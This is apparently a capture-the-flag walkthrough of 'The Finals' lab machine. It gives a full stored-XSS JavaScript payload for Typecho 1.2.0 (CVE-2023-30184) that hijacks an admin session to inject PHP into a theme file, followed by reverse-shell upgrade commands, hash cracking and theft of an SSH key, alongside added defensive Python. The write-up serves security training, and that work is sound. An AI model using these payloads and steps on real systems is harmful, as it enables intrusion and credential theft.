nmap -sCV -p- -O -vvv -oA thefinalsSCAN 10.10.1.12
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.9 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Unix))
| http-methods:
| Supported Methods: HEAD GET POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
OS details: Linux 4.15 - 5.8
80/tcp HTTP
Looks like a website for the game, providing some info about the arenas, sponsors, and modes.
After some manual recon, nothing about this website is interesting, so let's move on to directory brute forcing.
The screenshots from the directory brute force show some pictures, but all of them are the same picture. We do get one useful piece of information: there is a web app behind it, probably a CMS named Typecho, and its version is 1.2.0.
Blog / Typecho
I have added thefinals.hmv to /etc/hosts
sudo sh -c 'echo "10.10.1.12 thefinals.hmv" >> /etc/hosts'
Using Wappalyzer extension, we double-checked that the blog is using Typecho and the version is 1.2.0
Now we start looking for a public exploit.
There are 18 CVEs, 8 of which are XSS. We don't have an account, and brute-forcing one wouldn't be the best idea because we don't know the password policy beyond "8-character string"; it doesn't say whether there are special characters, numbers, mixed case, etc.
So we need to look for an unauthenticated exploit.
CVE-2023-30184 / Stored XSS
How could we use this stored XSS to get a shell?
From this excellent blog, we got this exploit. It uses a stored XSS to silently open Typecho's theme editor in a hidden iframe and overwrite 404.php with malicious PHP code.
To test whether it works, the creator executes phpinfo().
// Stored XSS payload from the referenced blog: it runs in the admin's browser when
// manage-comments.php renders the comment and reuses that logged-in session to edit
// the active theme's 404.php through theme-editor.php.
function insertIframe() {
    var urlWithoutDomain = window.location.pathname;
    var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
    var tSrc = '';
    if (hasManageComments) {
        // Derive the editor path from the current admin path (works if /admin/ was renamed)
        tSrc = urlWithoutDomain.replace('manage-comments.php', 'theme-editor.php?theme=default&file=404.php');
    } else {
        tSrc = '/admin/theme-editor.php?theme=default&file=404.php';
    }
    // Zero-size iframe so the editor is never visible; writeShell() fires once it has loaded
    var iframeAttributes = "<iframe id='theme_id' src='" + tSrc + "' width='0%' height='0%' onload='writeShell()'></iframe>";
    var originalContent = document.body.innerHTML;
    document.body.innerHTML = (originalContent + iframeAttributes);
}

var isSaved = false;
function writeShell() {
    if (!isSaved) {
        // Same-origin iframe: the editor's textarea and buttons are reachable directly
        var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
        var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
        var oldData = content.value;
        // Prepend the test payload (phpinfo) to the template and click the editor's save button
        content.value = ('<?php phpinfo(); ?>\n') + oldData;
        btns[1].click();
        isSaved = true;
    }
}
insertIframe();
This is the payload we will use in the "Website" field in the comment section.
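The root cause of CVE-2023-30184 is that the comment's url/Website field is stored and rendered without being validated or escaped. As an added example (not Typecho's code or its fix), here is how a defender would handle that field: allow only absolute http(s) URLs on input and escape on output. The hostnames and payload string are constructed for the test.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Characters that never belong in a bare URL and signal markup or control-char injection
FORBIDDEN_CHARS = set('<>"\'`\x00\r\n\t ')


def validate_comment_url(raw: str) -> Optional[str]:
    """Return the URL to store, or None when the Website field must be dropped."""
    candidate = raw.strip()
    if not candidate:
        return None  # empty is fine: the comment simply gets no link
    if FORBIDDEN_CHARS & set(candidate):
        return None  # raw markup such as "><script ...> is rejected outright
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None  # javascript:, data:, and relative admin paths are rejected
    return candidate


def render_author(name: str, url: Optional[str]) -> str:
    """Escape on output as well: the stored value is untrusted in every context,
    including the admin's manage-comments page where the original XSS fired."""
    safe_name = html.escape(name, quote=True)
    if url is None:
        return f'<span class="author">{safe_name}</span>'
    safe_url = html.escape(url, quote=True)
    return f'<a href="{safe_url}" rel="nofollow noopener">{safe_name}</a>'
```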
id
uid=102(apache) gid=103(apache) groups=82(www-data),103(apache),103(apache)
# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/ash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
$ stty -a # take rows and columns numbers for the last command
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>
ls -la /home
drwxr-sr-x 2 june users 4096 Apr 3 17:00 june
drwx------ 4 scotty users 4096 Apr 23 17:28 scotty
drwx------ 4 staff users 4096 Apr 3 13:36 staff
Due to these permissions, we can read and execute in June's directory
I loved how the creator added the finals logo. Also, the message, if I am not wrong, is related to the game.
Going back to the CMS, we found its config file, and it contains MySQL credentials.
john hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
But since I don't like using the VM to crack the password because it takes a lot of time
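To make john's output above legible, here is the phpass scheme it is cracking, as an added example written for this walkthrough (not john's or Typecho's code): the character after $P$ is the log2 cost ('B' is index 13, so 2^13 = 8192 MD5 rounds, matching "iteration count is 8192"), the next 8 characters are the salt, and the 16-byte digest is encoded with phpass' own base64 alphabet. The salt and passwords in the test are constructed.

```python
import hashlib
import hmac

# phpass alphabet; the index of the cost character is the log2 iteration count
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data: bytes, count: int) -> str:
    """phpass' base64 variant: little-endian 6-bit groups, no padding."""
    out, i = "", 0
    while i < count:
        value = data[i]
        i += 1
        out += ITOA64[value & 0x3F]
        if i < count:
            value |= data[i] << 8
        out += ITOA64[(value >> 6) & 0x3F]
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out += ITOA64[(value >> 12) & 0x3F]
        if i >= count:
            break
        i += 1
        out += ITOA64[(value >> 18) & 0x3F]
    return out


def phpass_iterations(setting: str) -> int:
    """Decode the cost character: iterations = 2 ** index (phpass allows 7..30)."""
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    return 1 << count_log2


def phpass_crypt(password: str, setting: str) -> str:
    """Recompute the hash for `password` with the cost and 8-char salt in `setting`."""
    count = phpass_iterations(setting)
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(count):  # only 8192 fast MD5 rounds at cost 'B', hence crackable
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    return hmac.compare_digest(phpass_crypt(password, stored), stored)
```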
cat /var/log/scotty-main.log
Broadcast to eth0 10.10.1.15:1337
# and 1100+ line like it :)
So we listen on port 1337 on the VM and wait for a couple of minutes, but nothing happens. Since nothing on the VM is listening on 1337 either, connecting from our box to the VM on port 1337 is ruled out. Maybe UDP?
nc -nvlp 1337
# listen on UDP
nc -unvlp 1337
listening on [::]:1337 ...
connect to [::ffff:10.10.1.15]:1337 from [::ffff:10.10.1.15]:34232 ([::ffff:10.10.1.15]:34232)
We get a base64 string; decoding it gives an SSH private key, probably Scotty's.
Changing the key's permissions is a must unless you use sudo; if you don't change them and don't use sudo, you get this message:
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
Permissions 0777 for 'key' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "key": bad permissions
scotty@10.10.1.15: Permission denied (publickey,keyboard-interactive).
Shell as Scotty
The first thing to do when you get a shell, as they taught us in privilege escalation courses, is sudo -l.
When I tried this as Apache, it asked for a password, but for Scotty it tells us we can run a binary named secret.
sudo -l
User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret
sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
ls -la /dev/pts/
total 0
drwxr-xr-x 2 root root 0 May 20 01:09 .
drwxr-xr-x 14 root root 2840 May 20 01:09 ..
crw--w---- 1 apache tty 136, 0 May 20 03:06 0
crw--w---- 1 scotty tty 136, 1 May 20 03:11 1
c--------- 1 root root 5, 2 May 20 01:09 ptmx
A stored cross-site scripting (XSS) vulnerability in Typecho v1.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the url parameter at /index.php/archives/1/comment.
We could also have known to use /bin/ash from the fact that the target is Alpine Linux.
Upgrade TTY
Hope you liked the walkthrough. You can try the VM on , and you can also try The Finals game on ; I'm sure you will like it.